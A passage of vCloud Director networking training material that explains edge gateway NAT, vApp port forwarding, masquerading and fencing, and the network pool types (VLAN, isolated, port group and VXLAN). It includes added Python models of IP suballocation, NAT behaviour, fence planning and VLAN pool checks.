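        if a < pool_first or b > pool_last:
            raise ValueError(f"{first}-{last} is not inside the static pool "
                             f"{pool_first}-{pool_last}")
        for other, (oa, ob) in self.suballocations.items():
            if a <= ob and oa <= b:          # overlap: two tenants would own one address
                raise ValueError(f"{first}-{last} overlaps {other} ({oa}-{ob})")
        if any(a <= ip <= b for ip in self.allocated):
            raise ValueError(f"{first}-{last} contains addresses already allocated")
        self.suballocations[gateway] = (a, b)

    def owner(self, ip: str):
        """Name of the edge gateway whose suballocation contains ip, else None."""
        addr = ipaddress.ip_address(ip)
        for gateway, (a, b) in self.suballocations.items():
            if a <= addr <= b:
                return gateway
        return None

    def nat_address_ok(self, gateway: str, ip: str) -> bool:
        """A DNAT/SNAT external address must come from that gateway's own suballocation."""
        return self.owner(ip) == gateway

    def allocate(self) -> str:
        """Next free address for a normal allocation; suballocated ranges are skipped."""
        pool_first, pool_last = _parse_range(*self.static_pool)
        cur = pool_first
        while cur <= pool_last:
            if cur not in self.allocated and self.owner(str(cur)) is None:
                self.allocated.add(cur)
                return str(cur)
            cur += 1
        raise RuntimeError(f"static pool on {self.name} is exhausted")


def example_network() -> ExternalNetwork:
    """The layout from the slide: one /24, one pool, two tenant suballocations."""
    ext = ExternalNetwork("external", "172.20.10.0/24",
                          ("172.20.10.100", "172.20.10.199"))
    ext.suballocate("orgA-edge", "172.20.10.110", "172.20.10.119")
    ext.suballocate("orgB-edge", "172.20.10.120", "172.20.10.129")
    return ext


if __name__ == "__main__":
    ext = example_network()
    print("orgA may use .115 for NAT:", ext.nat_address_ok("orgA-edge", "172.20.10.115"))
    print("orgB may use .115 for NAT:", ext.nat_address_ok("orgB-edge", "172.20.10.115"))
    print("first normal allocations:", [ext.allocate() for _ in range(3)])
```

The point of the overlap and ownership checks is tenant isolation: if two gateways could claim the same external address, both would answer ARP for it on the shared external network, and Organization B could silently receive traffic meant for Organization A.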

Edge Gateway Destination NAT (Slide 3-28)

DNAT:
• Associates an external IP address or IP range with an internal IP address or IP range, on a 1:1 basis.
• Solicited responses return through the mapping.
• Unsolicited outbound traffic does not traverse the mapping.

[Figure, slide 3-28: an edge gateway (uplink 172.20.10.100, MAC 00:50:56:01:00:2b) between the external network and an organization VDC network that hosts a vApp at 192.168.100.170; the DNAT rule maps 172.20.10.204 to 192.168.100.170, and the gateway answers "ARP - Who has 172.20.10.204" with "172.20.10.204 is at 00:50:56:01:00:2b"]

Destination network address translation (DNAT) rules translate a packet's destination address and, optionally, destination IP port to the values you specify.

In the most common case, you associate a NAT service with an uplink interface on an edge gateway so that addresses on organization VDC networks are not exposed on the external network. You can also define NAT translations to associate IP addresses on separate organization VDC networks. The internal address or addresses of the DNAT rules must be on directly attached networks, or be reachable through static routes.

A DNAT mapping defined on an edge gateway is unidirectional with state. Connections matching the mapping specification are allowed through, and the resulting solicited responses return using the correct IP addresses and ports. Unsolicited outbound traffic does not traverse the mapping.

Inbound packets destined for the external addresses of DNAT rules are delivered to the external interface of the edge gateway. The gateway responds to Address Resolution Protocol (ARP) requests for each DNAT-defined external address. After the packets are received, the edge gateway rewrites the destination IP address, updates the checksum, and translates the destination port if needed.

A DNAT mapping may be a single IP-to-single IP rule or an IP range-to-IP range rule. In the case of an IP range, a 1:1 correlation exists between each IP pair from first to last. Protocol filtering can be defined for each DNAT rule.

Edge Gateway Source NAT (Slide 3-29)

SNAT:
• Associates an internal IP address or IP range with an external IP address or IP range, on a 1:1 basis.
• Solicited responses return through the mapping.
• Unsolicited inbound traffic does not traverse the mapping.

[Figure, slide 3-29: the same edge gateway (uplink 172.20.10.100, MAC 00:50:56:01:00:2b) with the SNAT rule mapping 192.168.100.170 to 172.20.10.204; the gateway again answers ARP for 172.20.10.204 with 00:50:56:01:00:2b]

Source network address translation (SNAT) translates the packet's source address and, optionally, the source port to the values you specify.

Source NAT is the reverse of destination NAT. Traffic leaving a specific IP address or IP range is transformed so that it appears to originate from a different IP address or IP range on an external network connected to the edge gateway. In the case of IP ranges, a 1:1 correlation exists between each sequential IP pair.

An SNAT mapping is unidirectional with state. Connections matching the mapping specification are allowed through, and the resulting solicited responses return using the correct IP addresses and ports. Unsolicited inbound traffic does not traverse the mapping.

As with DNAT, the gateway responds to ARP requests for each SNAT-defined external address. For outbound packets the edge gateway rewrites the source IP address, updates the checksums, and translates the source port if needed; for the returning replies it rewrites the destination back to the internal address and port recorded in the connection state.

Source NAT rules may be defined to target IP addresses on any network connected to the edge gateway. The external addresses of SNAT rules must be in the range of a directly attached subnet. The source address can be from a directly attached subnet or from a source that is routed to the gateway. If the source addresses are routed, the gateway must have the appropriate static routes defined for handling the response traffic.

Routed vApps: IP Translation (Slide 3-30)

IP translation:
• Associates an external IP address with a virtual machine IP address on a 1:1 basis.
• Bidirectional mapping.
• All traffic is passed. Configure firewall rules for protocol filtering.

[Figure, slide 3-30: a vApp network 192.168.100.0/24 with virtual machines 192.168.100.104 and 192.168.100.170 behind a vShield Edge on an organization VDC network; the IP translation rule maps 192.168.100.170 to 172.30.15.205, and the Edge answers "ARP - Who has 172.30.15.205" with "172.30.15.205 is at 00:50:56:01:00:2c"]

Unlike an edge gateway, which implements DNAT and SNAT rules, a vApp network Edge device can implement 1:1 IP translation, port forwarding, and IP masquerading.

IP translation is a true 1:1 bidirectional mapping of a virtual machine network interface to an external address. IP translation is similar to edge gateway destination NAT, except that IP translation is a full bidirectional mapping without protocol filtering. In terms of traffic, the specified virtual machine interface and the external IP address are synonymous.

When IP translation is enabled, all traffic not matching a rule is still routed through the Edge device, exposing vApp IP addresses to upstream networks. Configure firewall rules to block this traffic.

You can use IP masquerading to isolate the vApp network behind a many-to-one NAT configuration. But because IP masquerading and IP translation are mutually exclusive, you cannot use both in the same service configuration.

As with most NAT operations, the Edge device responds to ARP requests for all IP translation external addresses.

Routed vApps: Port Forwarding (Slide 3-31)

Port forwarding associates a TCP/UDP port with a virtual machine IP address and port.
Packets received on the vShield Edge external interface are forwarded and translated based on the rules.

Port forwarding provides external access to services running on virtual machines on the vApp network. Traffic matching a specified transport protocol that has been directed to the external interface of the Edge device is forwarded to the rule-specified virtual machine interface. The inbound port can be changed based on the forwarding rule configuration.

Response traffic from the virtual machine is transformed on the outbound to appear as originating from the external interface of the edge.

After port forwarding has been enabled, IP masquerading can be selected. If IP masquerading is not enabled, the edge device routes subnet traffic, exposing vApp virtual machine addresses to upstream networks.

Port forwarding NAT is mutually exclusive to IP translation. You cannot have both NAT services configured at the same time. Switching between the two types of NAT erases all existing rules.

Diagram: vApp network 192.168.100.0/24 with virtual machines 192.168.100.104 and 192.168.100.170 behind a vShield Edge at 172.30.15.5 on the organization VDC network; port forwarding rule TCP:8080 -> 192.168.100.170:80; a packet with Dest: 172.30.15.5, Proto: TCP:8080 arriving from the organization VDC network is forwarded as Dest: 192.168.100.170, Proto: TCP:80.

Routed vApps: IP Masquerading (Slide 3-32)

Many-to-one NAT
Also called port address translation (PAT) and NAT overload
Outbound packets from the vApp are translated to appear upstream as originating from the vShield Edge external interface.
Source TCP/UDP ports are changed as needed.
NAT must be enabled with the type set to Port Forwarding.

IP masquerading enables a typical port address translation configuration on the vApp network Edge. All outbound traffic is transformed as originating from the external interface of the vApp network Edge.

To enable IP masquerading, you must first enable NAT and set the NAT type to port forwarding. Because IP masquerading depends on a NAT type of port forwarding, IP masquerading cannot be used with IP translation.

For many vApp configurations, the use of IP masquerading might be preferred as it isolates the vApp network for duplication.

Diagram: vApp network 192.168.100.0/24 with virtual machines 192.168.100.104 and 192.168.100.170; packets leaving toward the organization VDC network carry Source IP: vShield Edge External IP, with the TCP source ports rewritten (the diagram shows TCP Source Port: 32785 and TCP Source Port: 61789).
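The NAT behaviours of slides 3-30 through 3-32 (1:1 IP translation, port forwarding with reverse-translated responses, and IP masquerading as stateful many-to-one PAT), together with the rules that IP translation and port forwarding are mutually exclusive and that switching NAT types erases the rules, as an added Python model. This is example code written for this page, not vCloud Director or vShield code: the class, method and rule-table names are the example's own, the packets are constructed test traffic, and the upstream host 10.0.0.9 is made up; the Edge and virtual machine addresses are the slides'. The masquerade path also illustrates the "unidirectional with state" property the SNAT slide describes: solicited replies are mapped back, unsolicited inbound traffic is dropped, and without masquerading unmatched traffic is simply routed, which is the exposure the slides tell you to close with firewall rules.

```python
"""Behavioural model of the vApp network Edge NAT modes on slides 3-30 to 3-32.

Added example, not vCloud Director or vShield code: the class, method and rule
names are this example's own; addresses come from the slides, packets are
constructed test traffic.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    proto: str = "TCP"


class VAppEdge:
    """One vApp network Edge with exactly one NAT type at a time."""

    def __init__(self, external_ip, nat_type):
        if nat_type not in ("ip_translation", "port_forwarding"):
            raise ValueError("NAT type must be ip_translation or port_forwarding")
        self.external_ip = external_ip
        self.nat_type = nat_type
        self.translations = {}  # internal IP -> external IP (1:1, both directions)
        self.forwards = {}      # (proto, external port) -> (internal IP, internal port)
        self.masquerade = False
        self.flows = {}         # (proto, Edge source port) -> (internal IP, internal port)
        self.next_port = 32768  # constructed first source port for masqueraded flows

    def set_nat_type(self, nat_type):
        """Switching between the two NAT types erases all existing rules."""
        self.__init__(self.external_ip, nat_type)

    def add_translation(self, internal_ip, external_ip):
        if self.nat_type != "ip_translation":
            raise ValueError("IP translation rules need the ip_translation NAT type")
        self.translations[internal_ip] = external_ip

    def add_forward(self, proto, external_port, internal_ip, internal_port):
        if self.nat_type != "port_forwarding":
            raise ValueError("port forwarding rules need the port_forwarding NAT type")
        self.forwards[(proto, external_port)] = (internal_ip, internal_port)

    def enable_masquerade(self):
        """IP masquerading depends on the port-forwarding NAT type."""
        if self.nat_type != "port_forwarding":
            raise ValueError("IP masquerading cannot be combined with IP translation")
        self.masquerade = True

    def outbound(self, pkt):
        """Packet leaving the vApp network; returns what the upstream network sees."""
        if pkt.src_ip in self.translations:  # 1:1: VM address and external address are synonymous
            return Packet(self.translations[pkt.src_ip], pkt.src_port, pkt.dst_ip, pkt.dst_port, pkt.proto)
        for (proto, ext_port), target in self.forwards.items():
            if (pkt.proto, pkt.src_ip, pkt.src_port) == (proto,) + target:
                # Response traffic appears to originate from the Edge external interface.
                return Packet(self.external_ip, ext_port, pkt.dst_ip, pkt.dst_port, pkt.proto)
        if self.masquerade:
            # Many-to-one PAT: rewrite the source to the Edge, pick a source port per flow,
            # and remember the flow so that the solicited reply can be mapped back.
            for (proto, port), target in self.flows.items():
                if (proto,) + target == (pkt.proto, pkt.src_ip, pkt.src_port):
                    return Packet(self.external_ip, port, pkt.dst_ip, pkt.dst_port, pkt.proto)
            port, self.next_port = self.next_port, self.next_port + 1
            self.flows[(pkt.proto, port)] = (pkt.src_ip, pkt.src_port)
            return Packet(self.external_ip, port, pkt.dst_ip, pkt.dst_port, pkt.proto)
        # No rule matched and no masquerading: the Edge routes the packet unchanged,
        # exposing the vApp address upstream (only firewall rules can block this).
        return pkt

    def inbound(self, pkt):
        """Packet arriving on the external interface; None means it is dropped."""
        for internal_ip, external_ip in self.translations.items():
            if pkt.dst_ip == external_ip:  # bidirectional mapping, no protocol filtering
                return Packet(pkt.src_ip, pkt.src_port, internal_ip, pkt.dst_port, pkt.proto)
        if pkt.dst_ip == self.external_ip:
            target = self.forwards.get((pkt.proto, pkt.dst_port))
            if target:
                return Packet(pkt.src_ip, pkt.src_port, target[0], target[1], pkt.proto)
            flow = self.flows.get((pkt.proto, pkt.dst_port))
            if flow:  # solicited response to a masqueraded flow
                return Packet(pkt.src_ip, pkt.src_port, flow[0], flow[1], pkt.proto)
            return None  # unsolicited traffic to the Edge itself is dropped
        # Addressed straight to a vApp address: routed through unless masquerading isolates it.
        return None if self.masquerade else pkt


if __name__ == "__main__":
    edge = VAppEdge("172.30.15.5", "port_forwarding")
    edge.add_forward("TCP", 8080, "192.168.100.170", 80)
    print(edge.inbound(Packet("10.0.0.9", 40000, "172.30.15.5", 8080)))
    edge.enable_masquerade()
    print(edge.outbound(Packet("192.168.100.104", 5555, "10.0.0.9", 53, "UDP")))
```

Running it with port forwarding alone shows the inbound rule and its reverse-translated response; enabling masquerading afterwards shows the source rewrite and, on a second unsolicited inbound packet, the drop. Calling set_nat_type("ip_translation") on the same object demonstrates that the forwarding rules and the masquerade flag are gone, as the slide says happens when the NAT type is switched.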

vApp Fencing (1) (Slide 3-33)

Fencing isolates virtual machines by segmenting the layer 2 broadcast domain, removing the possibility of inter-vApp MAC and IP address conflicts.
Only vApps that direct-connect to an organization VDC network can be fenced.
A vShield Edge device is deployed with IP translation rules mapping each virtual machine in the vApp to an IP address on the organization VDC network.
The fence provides firewall and NAT options.
You can change the NAT type.

You can choose to fence a vApp when the vApp has been configured with one or more direct connections to organization VDC networks. A direct-connect network is a literal reference to an organization VDC network. Directly connecting virtual machines can lead to MAC and IP address conflicts when other direct-connect vApps are deployed in the same manner. For direct-connect cases, fencing of the vApp should be considered. Only vApps that direct-connect to an organization VDC network can be fenced. A network Edge device is not deployed for direct-connect vApp networks unless the vApp is fenced.

Fencing the vApp causes a network Edge device to be deployed that separates the vApp virtual machines from the organization network. The Edge device has two interfaces: one interface is attached to the organization network and the other connects to the vApp. The vApp network has the same subnet address as the organization network, with the fencing Edge device separating the broadcast domains. The fencing Edge device is deployed with IP translation rules associating vApp virtual machine addresses with addresses allocated from the organization VDC network.

vApp Fencing (2) (Slide 3-34)

How many subnets are defined?
How many layer 2 broadcast domains?
A fencing vShield Edge device does not define a new subnet. It segments the layer 2 broadcast domain.

The diagram illustrates how fencing works. Each of the two vApps contains two virtual machines configured to direct-connect to a common organization VDC network. Because the vApp virtual machines have the same set of IP addresses, IP conflicts occur on the organization VDC network broadcast domain unless fencing is configured.

For each vApp, an edge device is deployed that isolates the virtual machines into a separate layer-2 broadcast domain. The edge devices are deployed with preconfigured IP translation rules based on which virtual machines in the vApp are connecting to the attached organization VDC network.

Diagram: an Edge Gateway fronts the Organization VDC Network 172.30.15.0/24. Two vApps each contain virtual machines 172.30.15.104 and 172.30.15.105 on a vApp network that is also 172.30.15.0/24. Each vApp sits behind its own vShield Edge; the first fence presents its virtual machines as 172.30.15.207 and 172.30.15.208 on the organization VDC network, the second as 172.30.15.209 and 172.30.15.210.

Multiple Fence Configuration (Slide 3-35)

Fencing a vApp fences all direct-connect networks (all or none).
One fence is deployed for each direct-connect network.
How many subnets are defined in the diagram?
How many layer 2 broadcast domains?

The diagram shows a vApp of two virtual machines configured to connect to two different organization VDC networks. When fencing is enabled, a separate edge device is deployed for each direct-connect organization VDC network. The edge devices each have a unique set of IP translation rules based on how the virtual machines in the vApp connect to the organization VDC networks.

Diagram: an edge gateway fronts organization VDC network A (172.30.15.0/24) and organization VDC network B (172.30.27.0/24). The vApp's virtual machines use 172.30.15.104 on a vApp network that is also 172.30.15.0/24 and 172.30.27.204 on a vApp network that is also 172.30.27.0/24; the fence toward network A presents 172.30.15.207 and the fence toward network B presents 172.30.27.52.

Answer:
2 subnets
4 layer 2 broadcast domains
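The fencing logic of slides 3-33 to 3-35 as an added Python planner (example code for this page, not vCloud Director's): it reports the address collisions that direct-connect vApps with identical addresses would cause on the shared broadcast domain, then deploys one fence per direct-connect network of each vApp (all or none), allocates an organization VDC address for every virtual machine on that network as the fence's IP translation rule, and counts subnets and layer 2 broadcast domains the way the slides do (a fence adds a broadcast domain but not a subnet). The function names, data layout and the simple sequential allocator are the example's own; the sample data reproduces the two diagrams, with the allocator's first free addresses chosen so that it hands out the addresses the diagrams show.

```python
"""Fence planner for direct-connect vApps, following slides 3-33 to 3-35.

Added example, not vCloud Director code: the function names, the data layout
and the address allocator are this example's own. The sample data reproduces
the two diagrams; the first free addresses given to the allocator are the
ones the diagrams show.
"""
import ipaddress
from collections import Counter


def find_conflicts(vapps):
    """(network, address) pairs used by more than one direct-connect virtual machine:
    what collides on the shared broadcast domain when no vApp is fenced."""
    seen = Counter((net, ip) for vapp in vapps for net, ip in vapp["nics"])
    return sorted(key for key, count in seen.items() if count > 1)


def plan_fencing(org_networks, vapps, first_free):
    """Deploy one fence per direct-connect network of each vApp (all or none) and
    allocate an organization VDC address for every virtual machine on that network.

    Returns (fences, subnet_count, broadcast_domain_count)."""
    allocator = {net: ipaddress.ip_address(ip) for net, ip in first_free.items()}
    fences = []
    for vapp in vapps:
        for net in sorted({net for net, _ in vapp["nics"]}):
            subnet = ipaddress.ip_network(org_networks[net])
            rules = {}
            for nic_net, vm_ip in vapp["nics"]:
                if nic_net != net:
                    continue
                ext = allocator[net]
                if ext not in subnet:
                    raise RuntimeError(f"{net}: no free address left for {vapp['name']}")
                rules[vm_ip] = str(ext)  # IP translation rule: VM address <-> org VDC address
                allocator[net] = ext + 1
            fences.append({"vapp": vapp["name"], "network": net, "translation": rules})
    # A fence does not define a new subnet: the vApp network reuses the org VDC subnet.
    subnets = len(set(org_networks.values()))
    # Each org VDC network is one layer 2 broadcast domain; each fence adds one more.
    domains = len(org_networks) + len(fences)
    return fences, subnets, domains


# Slide 3-34: two vApps with identical addresses on one organization VDC network.
SLIDE_3_34 = dict(
    org_networks={"OrgVDC-Net": "172.30.15.0/24"},
    vapps=[{"name": "vApp-1", "nics": [("OrgVDC-Net", "172.30.15.104"), ("OrgVDC-Net", "172.30.15.105")]},
           {"name": "vApp-2", "nics": [("OrgVDC-Net", "172.30.15.104"), ("OrgVDC-Net", "172.30.15.105")]}],
    first_free={"OrgVDC-Net": "172.30.15.207"},
)
# Slide 3-35: one vApp whose two virtual machines connect to two organization VDC networks.
SLIDE_3_35 = dict(
    org_networks={"OrgVDC-Net-A": "172.30.15.0/24", "OrgVDC-Net-B": "172.30.27.0/24"},
    vapps=[{"name": "vApp-1", "nics": [("OrgVDC-Net-A", "172.30.15.104"), ("OrgVDC-Net-B", "172.30.27.204")]}],
    first_free={"OrgVDC-Net-A": "172.30.15.207", "OrgVDC-Net-B": "172.30.27.52"},
)

if __name__ == "__main__":
    print("conflicts without fencing:", find_conflicts(SLIDE_3_34["vapps"]))
    for plan in (SLIDE_3_34, SLIDE_3_35):
        fences, subnets, domains = plan_fencing(**plan)
        print(f"{len(fences)} fences, {subnets} subnets, {domains} layer 2 broadcast domains")
```

For the slide 3-35 data the planner returns 2 subnets and 4 broadcast domains, matching the answer given above; for slide 3-34 it returns 1 subnet and 3 broadcast domains (the organization VDC network plus one fence per vApp), and the conflict check lists both duplicated addresses.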

Review of Learner Objectives (Slide 3-36)

You should be able to meet the following objectives:
Describe NAT services provided by edge gateways and other network devices used in vCloud Director
Describe the difference between a fenced vApp and a routed vApp

Learner Objectives (Slide 3-38)

By the end of this lesson, you should be able to meet the following objectives:
Define a network pool
Describe the types of network pools

What is a network pool? A network pool is a predefined collection of vSphere network resources that can be used by vCloud Director to dynamically create a limited number of organization and vApp networks. Think of a network pool as a set of templates to help you create networks. The resources include things like VLAN IDs, port groups, virtual network switches, and vCloud Director isolated networks.

About Network Pools (Slide 3-39)

A network pool is a predefined collection of vSphere network resources that can be used by vCloud Director to dynamically create a limited number of organization and vApp networks.
All but direct-connect organization virtual data center networks require network pool resources.
All but direct-connect, nonfenced vApp networks require network pool resources.
If a network pool runs out of network resources, vCloud Director cannot create new networks based on this pool. Networks can be deleted to return resources to the network pool.
Network pools and organization quotas can be expanded.
Resources include ranges of VLAN IDs, port groups, virtual network switches, and vCloud Director isolated networks.

Network pools are used as a template to create networks at the organization and vApp levels.

Two types of organization VDC networks require network pools. These networks are routed organization VDC networks that connect to an external network through an edge gateway and isolated organization VDC networks.

All vApp networks are built off network pools. Although a direct-connect vApp does not consume network pool resources, fencing the vApp requires a network.

When you create a network pool, you must specify a maximum limit of networks. This value limits the number of networks that can be created from the pool.

Network Pools (Slide 3-40)

Used as a template to create new vCloud Director networks
Organization VDC networks:
  Routed organization VDC networks
  Isolated organization VDC networks
vApp networks:
  All nonfenced vApp networks
Each pool contains a maximum limit on the number of networks that can be created from it.
Network pools might become overcommitted, so VMware® recommends monitoring of network pool utilization.

A provider VDC gets its resources from vSphere. CPU and memory are combined into a resource pool. Storage is configured into datastores. All of these resources are used by vCloud Director to create a provider VDC. Networks are not included in resource pools or datastores. When you create a provider VDC, vCloud Director analyzes the underlying ESXi hosts and clusters that the resources come from. Based on that analysis, vCloud Director reports to you which external networks are available to organizations and vApps that are built on a provider VDC.

Organizations and vApps get their resources from an organization VDC, which is built on the provider VDC. When you create an organization VDC, vCloud Director enables you to associate the organization VDC directly with a network pool. The network pools are built on vSphere port groups, virtual switches, VLANs, and vCloud Director isolated networks.

(Provider) external networks are defined as being available to a provider VDC. Network pools are directly associated with specific organization VDCs.

Organizations, Network Pools, and Organization VDCs (1) (Slide 3-41)

Organization VDCs are assigned a network pool.
Each organization VDC can be assigned only one network pool.
A single network pool can be used by multiple organization VDCs, with the system administrator defining the quota for each organization VDC.
A single organization can have multiple organization VDCs and connect to multiple network pools.

Each cloud can have multiple organizations. Each organization can have its own organization VDCs. A single organization can have multiple VDCs. Multiple VDCs can connect to the same network pool. A single organization VDC cannot connect to multiple network pools.

Each network pool must be backed by a network resource in vSphere. The network resource has to be in the vSphere cluster that the cloud is built on. Network resources include VLANs, preexisting port groups, and vCloud Director isolated networks.

Diagram: an organization with several VDCs and their network pools (labels: organization; Network Pool; VDC, VDC; Network Pool, Network Pool; VDC; VDC).

Network Pool Backing (Slide 3-43)

Each network pool must be backed by a network resource.
Four types of network pools are possible:
  VLAN-backed
  vCloud Director isolated network-backed
  Port group-backed
  VXLAN-backed

Diagram labels: NetworkPool, VCD-NI 10

Network Pools Backed by VLANs (Slide 3-44)

New networks are created using VLANs.
VLAN ranges are configured in the network pool.
New networks select an available VLAN ID.
VMware® vCenter Server configures a new port group with the selected VLAN ID.
The number of networks is limited by the number of VLAN IDs in the pool.
Port groups are created automatically by vCenter Server.
VLAN IDs should also be configured on an uplink physical switch (trunk mode).

The most common type of network pool is one that is built on VLANs. For a VLAN type of network pool, you must specify a VLAN ID range or a group of VLAN ID ranges. When you specify VLAN ID ranges, do not overlap existing VLANs either in vCenter Server or in attached physical switches.

Exercise care when you configure your physical switches. When you put a port into trunk mode, verify that the VLANs you have configured on your ESXi host are defined and allowed by the switch trunk port. The default behavior varies among different types of switches and between vendors. You might need to define all the VLANs used with ESXi explicitly on the physical switch. For each VLAN definition, you can specify the VLAN ID, name, type, maximum transmission unit (MTU), security association identifier (SAID), state, ring number, bridge identification number, and so on.

For switches that allow all ports by default, you might not need to do anything. The VMware® best practice is to restrict the VLAN ranges to only those VLAN IDs that you need.

vSphere VXLAN networks are based on the IETF draft VXLAN standard. These networks support local-domain isolation equivalent to what is supported by vSphere isolation-backed networks.
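The checks this slide asks for on a VLAN-backed pool, as an added Python example (written for this page, not vCloud Director code): VLAN ID ranges are parsed and validated against the 1-4094 space, rejected if they overlap VLAN IDs already used in vCenter Server or on the physical switches, each new network takes one VLAN ID (the port group vCenter Server would create for it is represented by the dictionary entry), the pool's maximum and the supply of IDs both cap creation, a deleted network returns its ID, and the trunk allow-list is restricted to the pool's own IDs as the best practice above recommends. The range syntax "100-103, 110", the class and method names, and the inventory of VLANs in use elsewhere are the example's own constructed input.

```python
"""VLAN-backed network pool checks from slide 3-44: VLAN ID ranges must not
overlap VLANs already used in vCenter Server or on the physical switches, each
network takes one VLAN ID, and the pool caps how many networks can exist.

Added example, not vCloud Director code: the range syntax, class and method
names, and the inventory of VLANs in use elsewhere are this example's own
constructed input.
"""
import re

VLAN_MIN, VLAN_MAX = 1, 4094  # usable 802.1Q IDs (the page cites the 4094 limit)


def parse_vlan_ranges(spec):
    """'100-109,200,300-303' -> set of VLAN IDs; rejects malformed, reversed
    or out-of-range elements instead of silently skipping them."""
    ids = set()
    for part in spec.replace(" ", "").split(","):
        m = re.fullmatch(r"(\d+)(?:-(\d+))?", part)
        if not m:
            raise ValueError(f"bad VLAN range element: {part!r}")
        lo, hi = int(m.group(1)), int(m.group(2) or m.group(1))
        if not VLAN_MIN <= lo <= hi <= VLAN_MAX:
            raise ValueError(f"VLAN range {part!r} is reversed or outside {VLAN_MIN}-{VLAN_MAX}")
        ids.update(range(lo, hi + 1))
    return ids


class VlanNetworkPool:
    def __init__(self, name, vlan_spec, max_networks, in_use_elsewhere=()):
        """in_use_elsewhere: VLAN IDs already configured in vCenter Server or on
        attached physical switches (a constructed inventory here, not a live query)."""
        self.name = name
        self.free = parse_vlan_ranges(vlan_spec)
        overlap = self.free & set(in_use_elsewhere)
        if overlap:
            raise ValueError(f"pool {name}: VLAN IDs already in use elsewhere: {sorted(overlap)}")
        self.max_networks = max_networks
        self.networks = {}  # network name -> VLAN ID (one vCenter port group per entry)

    def create_network(self, net_name):
        """Take the lowest free VLAN ID for a new network, or fail when the pool is exhausted."""
        if len(self.networks) >= self.max_networks:
            raise RuntimeError(f"pool {self.name}: maximum of {self.max_networks} networks reached")
        if not self.free:
            raise RuntimeError(f"pool {self.name}: no VLAN IDs left")
        vlan = min(self.free)
        self.free.remove(vlan)
        self.networks[net_name] = vlan
        return vlan

    def delete_network(self, net_name):
        """Deleting a network returns its VLAN ID to the pool."""
        self.free.add(self.networks.pop(net_name))

    def utilization(self):
        """Fraction of the pool's maximum in use, for the monitoring the slides recommend."""
        return len(self.networks) / self.max_networks

    def trunk_allow_list(self):
        """VLAN IDs the uplink trunk ports need to allow: only the pool's own IDs,
        which is the VMware best practice of restricting trunks to what is needed."""
        return sorted(self.free | set(self.networks.values()))


if __name__ == "__main__":
    pool = VlanNetworkPool("Pool-A", "100-103, 110", max_networks=3, in_use_elsewhere={5, 200})
    for net in ("orgnet-1", "orgnet-2", "vappnet-1"):
        print(net, "-> VLAN", pool.create_network(net))
    print("utilization:", pool.utilization(), "trunk allow:", pool.trunk_allow_list())
```

Note that the pool has five VLAN IDs but a maximum of three networks, so the fourth create_network call fails on the maximum rather than on the ID supply; the overlap check fires at construction time, which is where vCloud Director asks for the ranges.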

Network Pools Backed by a vCloud Director Isolated Network (Slide 3-45)

Networks are created with the use of tunneling (encapsulation).
Traffic moves between ESXi hosts on network layer 2 by using MAC-in-MAC encapsulation.
vCenter Server creates the required port groups as needed.
Requirements: A distributed switch that is connected to all VMware® ESX®/ESXi hosts.

The second type of network pool is one backed by a vCloud Director isolated network. The vCloud Director isolated network is driven by the VSLAD agent that runs on ESXi hosts in the vSphere DRS/vSphere HA cluster. The VSLAD agent is part of the software in the VSLA kernel module.

vCloud Director isolated networks isolate network traffic. If a packet needs to leave the port group on one ESXi host to move to a different ESXi host, it is tunnelled through the VMkernel module. This tunneling uses MAC-in-MAC encapsulation, which puts a vCloud Director isolated network header in place and sends the packet out to the physical layer. A vCloud Director isolated network adds 24 bytes to the length of the packet.

Think of the vCloud Director isolated network as a software-based isolated network between two or more ESXi hosts which is using special packets at layer 2 of the network model (Ethernet layer). The packets are decoded in the VMkernel. Network traffic is isolated at layer 2. vCloud Director isolated networks can be used to connect traffic on multiple ESXi hosts.

Creating a network pool that is backed by the vCloud Director isolated network does not change anything on the vSphere layer. You will not see a vShield Edge device deployed. No new port groups appear. When a vApp that connects to a network is powered on, the vShield Edge device is deployed and the port group is created.

Diagram: two ESXi hosts, each with a VMkernel, connected by a vCloud Director isolated network tunnel.

Network Pools Backed by Port Groups (Slide 3-46)

New networks are created by using existing port groups.
Port groups must be created in advance by the vCenter Server administrator.
Port groups must be configured with VLAN IDs to meet vCloud security requirements.
The assignment of the vSphere port group to the network pool is static.
vCloud Director can create one network for each port group that is assigned to the network pool. Port groups can be on distributed switches or standard switches.
The VMware best practice is to use only distributed switches.

The final type of network pool backing is a network pool backed by vSphere port groups. The port groups on virtual switches must be created in advance by the VMware® vCenter™ administrator. These port groups must already have VLAN IDs configured to meet vCloud security requirements.

The network pool based on port groups is the least flexible type of network pool. However, this type of network pool backing does give the vCloud administrator total control over the configuration.

You can override the VLAN configuration requirement. VMware recommends against overriding the VLAN configuration requirement.

Network Pools Backed by VXLAN (1) (Slide 3-47)

Virtual extensible LAN.
Based on the IETF draft VXLAN standard.
A MAC-in-IP encapsulation designed to replace vCloud Director Isolated Networks. (Wraps layer 2 in layer 3.)
Adds a 24-bit VXLAN network identifier to the packet.
VXLAN networks support local-domain isolation equivalent to what is supported by vSphere isolation-backed networks.
When you create a provider VDC, a VXLAN network pool is created in vCloud Director.
When you use this network pool, VXLAN virtual wires are created in vCenter Server.

VXLAN is a new type of LAN connection that is designed to replace the vCloud Director Isolated Networks.

Network Pools Backed by VXLAN (2) (Slide 3-48)

No VXLAN is configured.
A router is required for virtual machines in both clusters to communicate with each other.
Virtual machines must be in different L2 broadcast domains.

If you have virtual machines running on two different clusters that have different VLAN IDs, these virtual machines cannot communicate with each other unless you set up a router between the clusters.

Diagram: DRS Cluster A (VLAN ID = 01) and DRS Cluster B (VLAN ID = 02) connected through a Router.

Network Pools Backed by VXLAN (3) (Slide 3-49)

VXLAN in use. No router is required for virtual machines in both clusters to communicate.
Virtual machines can be in the same L2 broadcast domain.
VLAN isolation is not required. Isolation is provided by VXLAN.
The VXLAN wire is a logical connection between two VTEPs.
VXLAN Virtual Tunnel End Point (VTEP) is on both ends of the VXLAN wire.

VXLANs enable you to connect two clusters with a VXLAN wire. The VXLAN wire is a logical connection between the two clusters. Each end of the wire must be anchored with a VXLAN Virtual Tunnel End Point (VTEP).

VXLAN is a routable protocol that does not require special configuration within a router. Because VXLAN is an encapsulation protocol, VLANs are not needed to isolate traffic. Each VXLAN wire is isolated.

VXLAN is not an encrypted protocol. Traffic is isolated, but it is not secured by encryption.

Diagram: DRS Cluster A and DRS Cluster B, each with a VTEP, connected by a VXLAN wire that crosses a Router.

Network Pools Backed by VXLAN (4) (Slide 3-50)

vCloud Director automatically creates a VXLAN pool for each provider VDC that is created.
